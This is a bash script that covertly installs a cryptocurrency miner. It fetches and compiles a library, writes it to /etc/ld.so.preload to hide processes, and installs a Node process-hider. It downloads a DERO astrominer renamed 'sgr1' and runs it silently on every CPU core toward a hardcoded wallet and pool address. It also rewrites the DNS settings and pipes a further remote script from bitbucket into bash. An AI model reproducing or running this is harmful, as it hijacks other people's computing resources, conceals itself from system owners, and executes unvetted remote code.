#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.7-BETA4/astrominer-V1.7_BETA4_generic_amd64_linux.tar.gz >/dev/null 2>&1
tar xf astrominer-V1.7_BETA4_generic_amd64_linux.tar.gz >/dev/null 2>&1
rm -rvf astrominer-V1.7_BETA4_generic_amd64_linux.tar.gz >/dev/null 2>&1
mv astrominer sgr1
sudo ./sgr1 -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xeuvxxyu5vj2x7qvrru4a -r 164.92.239.136:10100 -p rpc -m $(nproc --all) >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash
